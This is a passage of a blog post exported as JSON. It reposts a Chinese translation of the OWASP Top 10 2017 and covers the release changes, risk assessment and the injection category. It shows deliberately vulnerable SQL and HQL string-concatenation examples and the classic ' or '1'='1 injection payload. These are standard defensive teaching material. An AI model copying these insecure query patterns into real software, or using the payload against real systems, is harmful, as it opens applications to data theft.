{"id":1681,"date":"2024-05-08T17:37:31","date_gmt":"2024-05-08T09:37:31","guid":{"rendered":"http:\/\/oneai.eu.org\/?p=1681"},"modified":"2024-05-08T17:37:31","modified_gmt":"2024-05-08T09:37:31","slug":"owsasp%e5%b8%b8%e8%a7%81%e6%bc%8f%e6%b4%9e%e6%94%bb%e5%87%bb%e4%b8%8e%e4%bf%ae%e5%a4%8d","status":"publish","type":"post","link":"https:\/\/oneai.eu.org\/?p=1681","title":{"rendered":"owsasp\u5e38\u89c1\u6f0f\u6d1e\u653b\u51fb\u4e0e\u4fee\u590d"},"content":{"rendered":"<p><a href=\"http:\/\/m.sohu.com\/a\/139968130_669829\/?pvid=000115_3w_a\">http:\/\/m.sohu.com\/a\/139968130_669829\/?pvid=000115_3w_a<\/a><\/p>\n<p>\u6765\u81ea\uff1a\u6ef4\u6ef4\u5b89\u5168\u5e94\u6025\u54cd\u5e94\u4e2d\u5fc3\uff08\u5fae\u4fe1\u53f7\uff1adidisrc\uff09<\/p>\n<p>\u6587\u7ae0\u7531\u6ef4\u6ef4\u5b89\u5168\u539f\u521b\uff0c\u8f6c\u8f7d\u8bf7\u6ce8\u660e\u51fa\u5904<\/p>\n<p>OWASP(\u5f00\u653eWeb\u8f6f\u4f53\u5b89\u5168\u9879\u76ee- Open WebApplication Security Project)\u662f\u4e00\u4e2a\u5f00\u653e\u793e\u7fa4\u3001\u975e\u76c8\u5229\u6027\u7ec4\u7ec7\uff0c\u957f\u671f\u81f4\u529b\u4e8e\u534f\u52a9\u653f\u5e9c\u6216\u4f01\u4e1a\u4e86\u89e3\u5e76\u6539\u5584\u7f51\u9875\u5e94\u7528\u7a0b\u5f0f\u4e0e\u7f51\u9875\u670d\u52a1\u7684\u5b89\u5168\u6027\uff0c\u5177\u6709\u5f88\u5f3a\u7684\u6743\u5a01\u6027\u3002<\/p>\n<p>I <\/p>\n<p>\u7b80\u4ecb<\/p>\n<p>\u6b22\u8fce<\/p>\n<p>\u6b22\u8fce\u9605\u8bfb2017\u5e74\u7248\u7684OWASP Top 10\uff01\u8fd9\u4e2a\u4e3b\u8981\u7684\u66f4\u65b0\u9996\u6b21\u589e\u52a0\u4e86\u4e24\u4e2a\u65b0\u7684\u6f0f\u6d1e\u7c7b\u522b\uff1a(1) \u653b\u51fb\u68c0\u6d4b\u4e0e\u9632\u8303\u4e0d\u8db3 (2) \u672a\u53d7\u4fdd\u62a4\u7684API\u3002\u6211\u4eec\u901a\u8fc7\u5c06\u4e24\u4e2a\u8bbf\u95ee\u63a7\u5236\u7c7b\u522b\uff082013-A4\u548c2013-A7\uff09\u5408\u5e76\u56de\u5230\u5931\u6548\u7684\u8bbf\u95ee\u63a7\u5236\uff08\u8fd9\u662f2014\u5e74\u7248Top 10\u7684\u5206\u7c7b\u540d\uff09\u4e2d\uff0c\u4e3a\u8fd9\u4e24\u4e2a\u65b0\u7c7b\u522b\u817e\u51fa\u7a7a\u95f4\uff0c\u5e76\u5c062013-A10 \u201c\u672a\u7ecf\u9a8c\u8bc1\u7684\u91cd\u5b9a\u5411\u548c\u8f6c\u53d1\u201d\u53bb\u6389\u3002<\/p>\n<p>2017\u5e74\u7248\u7684OWASP Top 10\u6587\u6863\u57fa\u4e8e\u6765\u81ea\u4e13\u4e1a\u7684\u5e94\u7528\u5b89\u5168\u516c\u53f8\u768411\u4e2a\u5927\u578b\u6570\u636e\u5e93\uff0c\u5176\u4e2d\u5305\u62ec\uff1a8\u5bb6\u54a8\u8be2\u516c\u53f8\uff0c3\u5bb6\u4ea7\u54c1\u63d0\u4f9b\u5546\u3002\u6570\u636e\u6db5\u76d6\u4e86\u6765\u81ea\u4e0a\u767e\u5bb6\u7ec4\u7ec7\u4e0a\u5343\u4e2a\u5e94 \u7528\uff0c\u8d85\u8fc750,000\u4e2a\u771f\u5b9e\u73af\u5883\u4e2d\u7684\u6f0f\u6d1e\u548cAPIs\u3002Top 10\u6839\u636e\u6240\u6709\u8fd9\u4e9b\u76f8\u5173\u6570\u636e\u6311\u9009\u548c\u6392\u5e8f\uff0c\u5e76\u4e0e\u53ef\u5229\u7528\u6027\u3001\u53ef\u68c0\u6d4b\u6027\u548c\u5f71\u54cd\u7a0b\u5ea6\u7684\u4e00\u81f4\u8bc4\u4f30\u76f8\u7ed3\u5408\u3002<\/p>\n<p>OWASP Top 10\u7684\u4e3b\u8981\u76ee\u7684\u662f\u6559\u80b2\u5f00\u53d1\u4eba\u5458\uff0c\u8bbe\u8ba1\u5e08\uff0c\u67b6\u6784\u5e08\uff0c\u7ecf\u7406\u548c\u7ec4\u7ec7\uff0c\u4e86\u89e3\u6700\u91cd\u8981\u7684Web\u5e94\u7528\u7a0b\u5e8f\u5b89\u5168\u6f0f\u6d1e\u7684\u540e\u679c\u3002Top 10\u63d0\u4f9b\u4e86\u9632\u8303\u8fd9\u4e9b\u9ad8\u98ce\u9669\u95ee\u9898\u9886\u57df\u7684\u57fa\u672c\u6280\u672f\uff0c\u5e76\u4e3a\u60a8\u63d0\u4f9b\u4e86\u4ece\u8fd9\u91cc\u8d70\u5230\u54ea\u91cc\u7684\u6307\u5bfc\u3002<\/p>\n<p>\u8b66\u544a<\/p>\n<p>\u4e0d\u8981\u4ec5\u5173\u6ce8OWASP Top 10\uff1a\u6b63\u5982\u5728\u300aOWASP\u5f00\u53d1\u8005\u6307\u5357\u300b\u548c\u300aOWASP Cheat Sheet\u300b\u4e2d\u6240\u8ba8\u8bba\u7684\uff0c\u80fd\u5f71\u54cd\u6574\u4e2aweb\u5e94\u7528\u7a0b\u5e8f\u5b89\u5168\u7684\u6f0f\u6d1e\u6210\u767e\u4e0a\u5343\u3002\u8fd9\u4e9b\u6307\u5357\u662f\u5f53\u4ecaweb\u5e94\u7528\u7a0b\u5e8f\u5f00\u53d1\u4eba\u5458\u7684\u5fc5\u8bfb\u8d44\u6599\u3002\u800c\u300aOWASP\u6d4b\u8bd5\u6307\u5357\u300b\u548c\u300aOWASP\u4ee3\u7801\u5ba1\u67e5\u6307\u5357\u300b\u5219\u6307\u5bfc\u4eba\u4eec\u5982\u4f55\u6709\u6548\u5730\u67e5\u627eweb \u5e94\u7528\u7a0b\u5e8f\u4e2d\u7684\u6f0f\u6d1e\u3002\u8fd9\u4e24\u672c\u6307\u5357\u5728\u53d1\u5e03OWASP Top 10\u7684\u524d\u7248\u672c\u65f6\u5c31\u5df2\u7ecf\u8fdb\u884c\u4e86\u660e\u663e\u66f4\u65b0\u3002<\/p>\n<p>\u4e0d\u65ad\u4fee\u6539\uff1a\u6b64Top 10\u5c06\u4e0d\u65ad\u66f4\u65b0\u3002\u5373\u4f7f\u60a8\u4e0d\u6539\u53d8\u5e94\u7528\u7a0b\u5e8f\u7684\u4efb\u4f55\u4e00\u884c\u4ee3\u7801\uff0c\u60a8\u7684\u5e94\u7528\u7a0b\u5e8f\u53ef\u80fd\u5df2\u7ecf\u5b58\u5728\u4ece\u6765\u6ca1\u6709\u88ab\u4eba\u53d1\u73b0\u8fc7\u7684\u6f0f\u6d1e\u3002\u8981\u4e86\u89e3\u66f4\u591a\u4fe1\u606f\uff0c\u8bf7\u67e5\u770bTop 10\u7ed3\u5c3e\u7684\u5efa\u8bae\u90e8\u5206\uff0c\u201c\u5f00\u53d1\u4eba\u5458\u3001\u6d4b\u8bd5\u4eba\u5458\u548c\u4f01\u4e1a\u7ec4\u7ec7\u4e0b\u4e00\u6b65\u505a\u4ec0\u4e48\u201d\u3002<\/p>\n<p>\u6b63\u9762\u601d\u8003\uff1a\u5f53\u60a8\u5df2\u7ecf\u505a\u597d\u51c6\u5907\u505c\u6b62\u67e5\u627e\u6f0f\u6d1e\u5e76\u96c6\u4e2d<\/p>\n<p>\u7cbe\u529b\u5efa\u7acb\u5f3a\u5927\u7684\u5e94\u7528\u7a0b\u5e8f\u5b89\u5168\u63a7\u5236\u65f6\uff0cOWASP\u5df2\u7ecf\u5236\u4f5c\u4e86\u300a\u5e94\u7528\u7a0b\u5e8f\u5b89\u5168\u9a8c\u8bc1\u6807\u51c6\uff08ASVS\uff09\u300b\u6307\u5bfc\u4f01\u4e1a\u7ec4\u7ec7\u548c\u5e94\u7528\u7a0b\u5e8f\u5ba1\u67e5\u8005\u5982\u4f55\u53bb\u8fdb\u884c\u9a8c\u8bc1\u3002<\/p>\n<p>\u660e\u667a\u4f7f\u7528\u5de5\u5177\uff1a\u5b89\u5168\u6f0f\u6d1e\u53ef\u80fd\u5f88\u590d\u6742\u5e76\u4e14\u85cf\u533f\u5728\u4ee3\u7801\u884c\u7684\u6df1\u5904\u3002\u67e5\u627e\u5e76\u6d88\u9664\u8fd9\u4e9b\u6f0f\u6d1e\u7684\u6700\u6839\u672c\u6709\u6548\u7684\u65b9\u6cd5\u5c31\u662f\u5229\u7528\u4e13\u5bb6\u7684\u7ecf\u9a8c\u4ee5\u53ca\u597d\u7684\u5de5\u5177\u3002<\/p>\n<p>\u5176\u4ed6\uff1a\u5728\u60a8\u7684\u7ec4\u7ec7\u4e2d\uff0c\u91cd\u70b9\u5173\u6ce8\u8ba9\u5b89\u5168\u6210\u4e3a\u7ec4\u7ec7\u6587\u5316\u7684\u4e00\u90e8\u5206\u3002\u66f4\u591a\u4fe1\u606f\uff0c\u8bf7\u53c2\u89c1\u300a\u5f00\u653e\u8f6f\u4ef6\u4fdd\u8bc1\u6210\u719f\u5ea6\u6a21\u578b\uff08SAMM\uff09\u300b\u548c\u300aRugged Handbook\u300b\u3002<\/p>\n<p>RN<\/p>\n<p>\u53d1\u884c\u8bf4\u660e<\/p>\n<p>\u4ece2013\u7248\u52302017\u7248\u6709\u4ec0\u4e48\u6539\u53d8\uff1f<\/p>\n<p>\u5e94\u7528\u7a0b\u5e8f\u5b89\u5168\u7684\u5a01\u80c1\u60c5\u51b5\u4e0d\u65ad\u6539\u53d8\u3002\u8fd9\u79cd\u6f14\u53d8\u7684\u5173\u952e\u56e0\u7d20\u662f\u8fc5\u901f\u91c7\u7528\u65b0\u6280\u672f\uff08\u5305\u62ec\u4e91\u8ba1\u7b97\uff0c\u5bb9\u5668\u548cAPIs\uff09\uff0c\u8f6f\u4ef6\u5f00\u53d1\u8fc7\u7a0b\uff08\u5982\u654f\u6377\u5f00\u53d1\u548cDevOps\uff09\u7684\u52a0\u901f\u548c\u81ea\u52a8\u5316\uff0c\u7b2c\u4e09\u65b9\u5e93\u548c\u6846\u67b6\u7684\u7206\u70b8\u5f0f\u589e\u957f\u4ee5\u53ca\u653b\u51fb\u8005\u7684\u8fdb\u6b65\u3002\u8fd9\u4e9b\u56e0\u7d20\u5f80\u5f80\u4f7f\u5e94\u7528\u7a0b\u5e8f\u548cAPIs\u66f4\u96be\u5206\u6790\uff0c\u5e76\u53ef\u4ee5\u663e\u8457\u6539\u53d8\u5a01\u80c1\u5f62\u6001\u3002\u4e3a\u8ddf\u4e0a\u53d1\u5c55\uff0c\u6211\u4eec\u5468\u671f\u6027\u7684\u66f4\u65b0OWASP Top 10\u3002\u5728\u672c\u6b212017\u5e74\u7248\u672c\u4e2d\uff0c\u6211\u4eec\u505a\u4e86\u4ee5\u4e0b\u6539\u53d8\uff1a<\/p>\n<p>1) \u6211\u4eec\u5408\u5e76\u4e862013-A4\u201c\u4e0d\u5b89\u5168\u7684\u76f4\u63a5\u5bf9\u8c61\u5f15\u7528\u201d\u548c2013-A7\u201c\u529f\u80fd\u7ea7\u8bbf\u95ee\u63a7\u5236\u529f\u80fd\u7f3a\u5931\u201d\u52302017-A4\u201c\u65e0\u6548\u7684\u8bbf\u95ee\u63a7\u5236\u201d\u3002<\/p>\n<p>o 2007\u5e74\uff0c\u6211\u4eec\u5c06\u5931\u6548\u7684\u8bbf\u95ee\u63a7\u5236\u5206\u4e3a\u4e24\u7c7b\uff0c\u4ee5\u4fbf\u66f4\u591a\u5730\u5173\u6ce8\u8bbf\u95ee\u63a7\u5236\u95ee\u9898\uff08\u6570\u636e\u548c\u529f\u80fd\uff09\u7684\u6bcf\u4e00\u65b9\u9762\u3002\u6211\u4eec\u4e0d\u518d\u89c9\u5f97\u8fd9\u662f\u5fc5\u8981\u7684\uff0c\u6240\u4ee5\u6211\u4eec\u5c06\u5b83<\/p>\n<p>\u4eec\u5408\u5e76\u5728\u4e00\u8d77\u3002<\/p>\n<p>2) \u6211\u4eec\u589e\u52a0\u4e862017-A7\uff1a\u653b\u51fb\u68c0\u6d4b\u4e0e\u9632\u8303\u4e0d\u8db3<\/p>\n<ul>\n<li>\u591a\u5e74\u6765\uff0c\u6211\u4eec\u8003\u8651\u589e\u52a0\u5bf9\u81ea\u52a8\u653b\u51fb\u7684\u9632\u5fa1\u529b\u4e0d\u8db3\u3002\u57fa\u4e8e\u6570\u636e\u8c03\u7528\uff0c\u6211\u4eec\u770b\u5230\u5927\u591a\u6570\u5e94\u7528\u7a0b\u5e8f\u548cAPI\u7f3a\u4e4f\u68c0\u6d4b\u4e0e\u9632\u8303\u548c\u54cd\u5e94\u624b\u52a8\u6216\u8005\u81ea\u52a8\u5316\u653b\u51fb\u7684\u57fa\u672c\u529f\u80fd\u5e94\u7528\u7a0b\u5e8f\u548cAPIs\u6240\u6709\u8005\u8fd8\u9700\u8981\u80fd\u591f\u5feb\u901f\u90e8\u7f72\u8865\u4e01\u4ee5\u4fdd\u62a4\u548c\u9632\u6b62\u653b\u51fb\u3002<\/li>\n<\/ul>\n<p>3) \u6211\u4eec\u589e\u52a0\u4e862017-A10: \u672a\u53d7\u4fdd\u62a4\u7684API<\/p>\n<ul>\n<li>\u73b0\u4ee3\u5e94\u7528\u7a0b\u5e8f\u548cAPI\u901a\u5e38\u6d89\u53ca\u4e30\u5bcc\u7684\u5ba2\u6237\u7aef\u5e94\u7528\u7a0b\u5e8f\uff0c\u4f8b\u5982\u6d4f\u89c8\u5668\u4e2d\u7684Java\u548c\u79fb\u52a8\u7aef\u5e94\u7528\u7a0b\u5e8f\uff0c\u8fde\u63a5\u5230\u67d0\u79cdAPI\uff08SOAP \/ XML\uff0cREST \/JSON\uff0cRPC\uff0cGWT\u7b49\uff09\u3002\u8fd9\u4e9bAPI\u901a\u5e38\u662f\u4e0d\u53d7\u4fdd\u62a4\u7684\uff0c\u5e76\u4e14\u5305\u542b\u8bb8\u591a\u6f0f\u6d1e\u3002\u6211\u4eec\u5c06\u5176\u5305\u62ec\u5728\u8fd9\u91cc\uff0c\u4ee5\u5e2e\u52a9\u7ec4\u7ec7\u4e13\u6ce8\u4e8e\u8fd9\u4e00\u4e3b\u8981\u7684\u65b0\u5174\u98ce\u9669\u3002<\/li>\n<\/ul>\n<p>4) \u6211\u4eec\u53bb\u6389\u4e862013-A10:\u672a\u9a8c\u8bc1\u7684\u91cd\u5b9a\u5411\u548c\u8f6c\u53d1<\/p>\n<p>\u2013 2010\u5e74\uff0c\u6211\u4eec\u589e\u52a0\u4e86\u8fd9\u4e00\u7c7b\u522b\uff0c\u4ee5\u63d0\u9ad8\u5bf9\u8fd9\u4e2a\u95ee\u9898\u7684\u8ba4\u8bc6\u3002\u7136\u800c\uff0c\u6570\u636e\u663e\u793a\uff0c\u8fd9\u4e2a\u95ee\u9898\u5e76\u4e0d\u50cf\u9884\u671f\u90a3\u4e48\u666e\u904d\u3002\u6240\u4ee5\u5728\u8fdb\u5165top 10\u7684\u6700\u540e\u4e24\u4e2a\u7248\u672c\u4e4b\u540e\uff0c\u8fd9\u4e00\u6b21\u5e76\u6ca1\u6709\u524a\u51cf\u3002<\/p>\n<p>\u6ce8\u610f\uff1aT10\u56f4\u7ed5\u4e3b\u8981\u98ce\u9669\u533a\u57df\u8fdb\u884c\u6574\u7406\uff0c\u800c\u4e0d\u662f\u5bc6\u5c01\uff0c\u4e0d\u91cd\u53e0\u6216\u4e25\u683c\u7684\u5206\u7c7b\u3002\u5176\u4e2d\u4e00\u4e9b\u662f\u56f4\u7ed5\u7740\u653b\u51fb\u8005\u6574\u7406\u7684\uff0c\u4e00\u4e9b\u662f\u8106\u5f31\u6027\uff0c\u4e00\u4e9b\u662f\u9632\u5fa1\uff0c\u4e00\u4e9b\u662f\u8d44\u4ea7\u3002\u7ec4\u7ec7\u5e94\u8003\u8651\u5236\u5b9a\u63aa\u65bd\uff0c\u4ee5\u6d88\u9664\u8fd9\u4e9b\u95ee\u9898\u3002<\/p>\n<p>\u98ce\u9669<\/p>\n<p>\u5e94\u7528\u7a0b\u5e8f\u5b89\u5168\u98ce\u9669<\/p>\n<p>\u4ec0\u4e48\u662f\u5e94\u7528\u7a0b\u5e8f\u5b89\u5168\u98ce\u9669<\/p>\n<p>\u653b\u51fb\u8005\u53ef\u4ee5\u901a\u8fc7\u5e94\u7528\u7a0b\u5e8f\u4e2d\u8bb8\u591a\u4e0d\u540c\u7684\u8def\u5f84\u65b9\u6cd5\u53bb\u5371\u5bb3\u60a8\u7684\u4e1a\u52a1\u6216\u8005\u4f01\u4e1a\u7ec4\u7ec7\u3002<\/p>\n<p>\u6bcf\u79cd\u8def\u5f84\u65b9\u6cd5\u90fd\u4ee3\u8868\u4e86\u4e00\u79cd\u98ce\u9669\uff0c \u8fd9\u4e9b\u98ce\u9669\u53ef\u80fd\u4f1a\uff0c\u4e5f\u6709\u53ef\u80fd\u4e0d\u4f1a\u4e25\u91cd\u5230\u503c\u5f97\u60a8\u5173\u6ce8\u3002<\/p>\n<p>\u6709\u65f6\uff0c\u8fd9\u4e9b\u8def\u5f84\u65b9\u6cd5\u5f88\u5bb9\u6613\u88ab\u53d1\u73b0\u5e76\u5229\u7528\uff0c\u4f46\u6709\u7684\u5219\u975e\u5e38\u56f0\u96be\u3002\u540c\u6837\uff0c\u6240\u9020\u6210\u5371\u5bb3\u7684\u8303\u56f4\u4e5f\u4ece\u65e0\u635f\u574f\u5230\u6709\u53ef\u80fd\u5b8c\u5168\u635f\u5bb3\u60a8\u7684\u6574\u4e2a\u4e1a\u52a1\u3002\u4e3a\u4e86\u786e\u5b9a\u60a8\u7684\u4f01\u4e1a\u7684\u98ce\u9669\uff0c\u53ef\u4ee5\u7ed3\u5408\u5176\u4ea7\u751f\u7684\u6280\u672f\u5f71\u54cd\u548c\u5bf9\u4f01\u4e1a\u7684\u4e1a\u52a1\u5f71\u54cd\uff0c\u53bb\u8bc4\u4f30\u5a01\u80c1\u4ee3\u7406\u3001\u653b\u51fb \u5411\u91cf\u548c\u5b89\u5168\u6f0f\u6d1e\u7684\u53ef\u80fd\u6027\u3002\u603b\u4e4b\uff0c\u8fd9\u4e9b\u56e0\u7d20\u51b3\u5b9a\u4e86\u5168\u90e8\u7684\u98ce\u9669\u3002<\/p>\n<p>\u6211\u7684\u98ce\u9669\u662f\u4ec0\u4e48\uff1f<\/p>\n<p>OWASP Top 10\u7684\u91cd\u70b9\u5728\u4e8e\u4e3a\u5e7f\u5927\u4f01\u4e1a\u7ec4\u7ec7\u786e\u5b9a\u4e00\u7ec4\u6700\u4e25\u91cd\u7684\u98ce\u9669\u3002\u5bf9\u4e8e \u5176\u4e2d\u7684\u6bcf\u4e00\u9879\u98ce\u9669\uff0c\u6211\u4eec\u5c06\u4f7f\u7528\u57fa\u4e8eOWASP\u98ce\u9669\u7b49\u7ea7\u6392\u5e8f\u65b9\u6cd5\u7684\u7b80\u5355\u8bc4\u7ea7\u65b9 \u6848\uff0c\u63d0\u4f9b\u5173\u4e8e\u53ef\u80fd\u6027\u548c\u6280\u672f\u5f71\u54cd\u65b9\u9762\u7684\u666e\u904d\u4fe1\u606f\u3002<\/p>\n<p>\u53ea\u6709\u60a8\u4e86\u89e3\u60a8\u81ea\u5df1\u7684\u7cfb\u7edf\u73af\u5883\u548c\u4f01\u4e1a\u7684\u5177\u4f53\u60c5\u51b5\u3002\u5bf9\u4e8e\u4efb\u4f55\u5df2\u77e5\u7684\u5e94\u7528\u7a0b\u5e8f\uff0c\u53ef\u80fd\u67d0\u79cd\u5a01\u80c1\u4ee3\u7406\u65e0\u6cd5\u5b9e\u65bd\u76f8\u5e94\u7684\u653b\u51fb\uff0c\u6216\u8005\u6280\u672f\u5f71\u54cd\u5e76\u6ca1\u6709\u4ec0\u4e48\u5dee\u522b\u3002\u56e0\u6b64\uff0c\u60a8\u5fc5\u987b\u4eb2\u81ea\u8bc4\u4f30\u6bcf\u4e00\u79cd\u98ce\u9669\uff0c\u7279\u522b\u662f\u9700\u8981\u9488\u5bf9\u60a8\u4f01\u4e1a\u5185\u90e8\u7684\u5a01\u80c1\u4ee3\u7406\u3001 \u5b89\u5168\u63a7\u5236\u3001\u4e1a\u52a1\u5f71\u54cd\u7b49\u65b9\u9762\u3002\u6211\u4eec\u5c06\u201c\u5a01\u80c1\u4ee3\u7406\u201d\u4f5c\u4e3a\u201c\u5e94\u7528\u63cf\u8ff0\u201d\uff0c\u201c\u4e1a \u52a1\u5f71\u54cd\u201d\u4f5c\u4e3a\u201c\u5e94\u7528\/\u4e1a\u52a1\u63cf\u8ff0\u201d\uff0c\u4ee5\u8bf4\u660e\u8fd9\u4e9b\u4f9d\u8d56\u4e8e\u60a8\u4f01\u4e1a\u4e2d\u5e94\u7528\u7684\u8be6\u7ec6\u4fe1\u606f\u3002<\/p>\n<p>Top 10\u4e2d\u98ce\u9669\u7684\u540d\u79f0\uff0c\u6709\u7684\u6765\u81ea\u4e8e\u653b\u51fb\u7684\u7c7b\u578b\uff0c\u6709\u7684\u6765\u81ea\u4e8e\u6f0f\u6d1e\uff0c\u800c\u6709\u7684\u6765\u81ea\u4e8e\u6240\u9020\u6210\u7684\u5f71\u54cd\u3002\u6211\u4eec\u9009\u62e9\u4e86\u6700\u80fd\u51c6\u786e\u53cd\u5e94\u51fa\u98ce\u9669\u540d\u79f0\uff0c\u5e76\u5728\u53ef\u80fd\u7684\u60c5\u51b5\u4e0b\uff0c\u540c\u65f6\u4f7f\u7528\u6700\u4e3a\u5e38\u7528\u7684\u4e13\u4e1a\u540d\u8bcd\u6765\u5f97\u5230\u6700\u9ad8\u7684\u5173\u6ce8\u5ea6\u3002<\/p>\n<p>\u53c2\u8003\u8d44\u6599<\/p>\n<p>OWASP\u8d44\u6599<\/p>\n<p>\u2022 OWASP Risk Rating Methodology<\/p>\n<p>\u2022 Article on Threat\/Risk Modeling<\/p>\n<p>\u5176\u4ed6\u8d44\u6599<\/p>\n<p>\u2022 FAIR Information Risk Framework<\/p>\n<p>\u2022 Microsoft Threat Modeling Tool<\/p>\n<p>T10<\/p>\n<p>OWASP Top 10 \u2013 2017 <\/p>\n<p>A1<\/p>\n<p>\u6ce8\u5165<\/p>\n<p>\u6211\u662f\u5426\u5b58\u5728\u6ce8\u5165\u6f0f\u6d1e?<\/p>\n<p>\u68c0\u6d4b\u5e94\u7528\u7a0b\u5e8f\u662f\u5426\u5b58\u5728\u6ce8\u5165\u6f0f\u6d1e\u7684\u6700\u597d\u7684\u529e\u6cd5\u5c31\u662f\u786e\u8ba4 \u6240\u6709\u89e3\u91ca\u5668\u7684\u4f7f\u7528\u90fd\u660e\u786e\u5730\u5c06\u4e0d\u53ef\u4fe1\u6570\u636e\u4ece\u547d\u4ee4\u8bed\u53e5\u6216\u67e5 \u8be2\u8bed\u53e5\u4e2d\u533a\u5206\u51fa\u6765\u3002\u5728\u8bb8\u591a\u60c5\u51b5\u4e0b\uff0c\u5efa\u8bae\u907f\u514d\u89e3\u91ca\u5668\u6216\u7981\u7528\u5b83\uff08\u4f8b\u5982XXE\uff09\u3002\u5bf9\u4e8eSQL\u8c03\u7528\uff0c\u8fd9\u5c31\u610f\u5473\u7740\u5728\u6240\u6709\u51c6\u5907\u8bed\u53e5\uff08prepared statements\uff09\u548c\u5b58\u50a8\u8fc7\u7a0b\uff08stored procedures\uff09 \u4e2d\u4f7f\u7528\u7ed1\u5b9a\u53d8\u91cf\uff08bind variables\uff09\uff0c\u5e76\u907f\u514d \u4f7f\u7528\u52a8\u6001\u67e5\u8be2\u8bed\u53e5\u3002<\/p>\n<p>\u68c0\u67e5\u5e94\u7528\u7a0b\u5e8f\u662f\u5426\u5b89\u5168\u4f7f\u7528\u89e3\u91ca\u5668\u7684\u6700\u5feb\u6700\u6709\u6548\u7684\u65b9\u6cd5 \u662f\u4ee3\u7801\u5ba1\u67e5\u3002\u4ee3\u7801\u5206\u6790\u5de5\u5177\u80fd\u5e2e\u52a9\u5b89\u5168\u5206\u6790\u8005\u627e\u5230\u4f7f\u7528\u89e3 \u91ca\u5668\u7684\u4ee3\u7801\u5e76\u8ffd\u8e2a\u5e94\u7528\u7684\u6570\u636e\u6d41\u3002\u6e17\u900f\u6d4b\u8bd5\u8005\u901a\u8fc7\u521b\u5efa\u653b \u51fb\u7684\u65b9\u6cd5\u6765\u786e\u8ba4\u8fd9\u4e9b\u6f0f\u6d1e\u3002<\/p>\n<p>\u53ef\u4ee5\u6267\u884c\u5e94\u7528\u7a0b\u5e8f\u7684\u81ea\u52a8\u52a8\u6001\u626b\u63cf\u5668\u80fd\u591f\u63d0\u4f9b\u4e00\u4e9b\u4fe1\u606f\uff0c \u5e2e\u52a9\u786e\u8ba4\u4e00\u4e9b\u53ef\u5229\u7528\u7684\u6ce8\u5165\u6f0f\u6d1e\u662f\u5426\u5b58\u5728\u3002\u7136\u800c\uff0c\u626b\u63cf\u5668 \u5e76\u975e\u603b\u80fd\u8fbe\u5230\u89e3\u91ca\u5668\uff0c\u6240\u4ee5\u4e0d\u5bb9\u6613\u68c0\u6d4b\u5230\u4e00\u4e2a\u653b\u51fb\u662f\u5426\u6210 \u529f\u3002\u4e0d\u6070\u5f53\u7684\u9519\u8bef\u5904\u7406\u4f7f\u5f97\u6ce8\u5165\u6f0f\u6d1e\u66f4\u5bb9\u6613\u88ab\u53d1\u73b0\u3002<\/p>\n<p>\u6211\u5982\u4f55\u9632\u6b62\u6ce8\u5165\u6f0f\u6d1e?<\/p>\n<p>\u9632\u6b62\u6ce8\u5165\u6f0f\u6d1e\u9700\u8981\u5c06\u4e0d\u53ef\u4fe1\u6570\u636e\u4ece\u547d\u4ee4\u53ca\u67e5\u8be2\u4e2d\u533a\u5206\u5f00\u3002<\/p>\n<p>1.\u6700\u4f73\u9009\u62e9\u662f\u4f7f\u7528\u5b89\u5168\u7684API\uff0c\u5b8c\u5168\u907f\u514d\u4f7f\u7528\u89e3\u91ca\u5668\u6216\u63d0 \u4f9b\u53c2\u6570\u5316\u754c\u9762\u7684API\u3002\u4f46\u8981\u6ce8\u610f\u6709\u4e9b\u53c2\u6570\u5316\u7684API\uff0c\u6bd4 \u5982\u5b58\u50a8\u8fc7\u7a0b\uff08stored procedures\uff09\uff0c\u5982\u679c\u4f7f\u7528\u4e0d\u5f53\uff0c\u4ecd\u7136\u53ef\u4ee5\u5f15\u5165\u6ce8\u5165\u6f0f\u6d1e\u3002 <\/p>\n<p>2.\u5982\u679c\u6ca1\u6cd5\u4f7f\u7528\u4e00\u4e2a\u53c2\u6570\u5316\u7684API\uff0c\u90a3\u4e48\u4f60\u5e94\u8be5\u4f7f\u7528\u89e3\u91ca\u5668\u5177\u4f53\u7684escape\u8bed\u6cd5\u6765\u907f\u514d\u7279\u6b8a\u5b57\u7b26\u3002OWASP\u7684ESAPI \u5c31\u6709\u4e00\u4e9bescape\u4f8b\u7a0b\u3002<\/p>\n<p>3.\u4f7f\u7528\u6b63\u9762\u7684\u6216\u201c\u767d\u540d\u5355\u201d\u7684\u5177\u6709\u6070\u5f53\u7684\u89c4\u8303\u5316\u7684\u8f93\u5165\u9a8c\u8bc1\u65b9\u6cd5\u540c\u6837\u4f1a\u6709\u52a9\u4e8e\u9632\u6b62\u6ce8\u5165\u653b\u51fb\u3002\u4f46\u7531\u4e8e\u5f88\u591a\u5e94\u7528\u5728\u8f93\u5165\u4e2d\u9700\u8981\u7279\u6b8a\u5b57\u7b26\uff0c\u8fd9\u4e00\u65b9\u6cd5\u4e0d\u662f\u5b8c\u6574\u7684\u9632\u62a4\u65b9\u6cd5\u3002 OWASP\u7684ESAPI\u4e2d\u5305\u542b\u4e00\u4e2a\u767d\u540d\u5355\u8f93\u5165\u9a8c\u8bc1\u4f8b\u7a0b\u7684\u6269\u5c55\u5e93\u3002<\/p>\n<p>\u653b\u51fb\u6848\u4f8b<\/p>\n<p>\u6848\u4f8b #1: \u5e94\u7528\u7a0b\u5e8f\u5728\u4e0b\u9762\u5b58\u5728\u6f0f\u6d1e\u7684SQL\u8bed\u53e5\u7684\u6784\u9020\u4e2d\u4f7f \u7528\u4e0d\u53ef\u4fe1\u6570\u636e\uff1a<\/p>\n<p>String query = &quot;SELECT * FROM accounts WHERE<\/p>\n<p>custID='&quot; + request.getParameter(&quot;id&quot;) + &quot;'&quot;;<\/p>\n<p>\u6848\u4f8b #2: \uff1a\u540c\u6837\u7684\uff0c\u6846\u67b6\u5e94\u7528\u7684\u76f2\u76ee\u4fe1\u4efb\uff0c\u4ecd\u7136\u53ef\u80fd\u5bfc\u81f4\u67e5 \u8be2\u8bed\u53e5\u7684\u6f0f\u6d1e\u3002\uff08\u4f8b\u5982\uff1aHibernate\u67e5\u8be2\u8bed\u8a00\uff08HQL\uff09\uff09\uff1a<\/p>\n<p>Query HQLQuery = session.createQuery(&quot;FROM accounts<\/p>\n<p>WHERE custID='&quot; + request.getParameter(&quot;id&quot;) + &quot;'&quot;);<\/p>\n<p>\u5728\u8fd9\u4e24\u4e2a\u6848\u4f8b\u4e2d\uff0c\u653b\u51fb\u8005\u5728\u6d4f\u89c8\u5668\u4e2d\u5c06\u201cid\u201d\u53c2\u6570\u7684\u503c\u4fee\u6539 \u6210 \u2019 or\u20191\u2019=\u20191\u3002\u5982\uff1a<\/p>\n<p><a href=\"http:\/\/example.com\/app\/accountView?id\">http:\/\/example.com\/app\/accountView?id<\/a>=' or 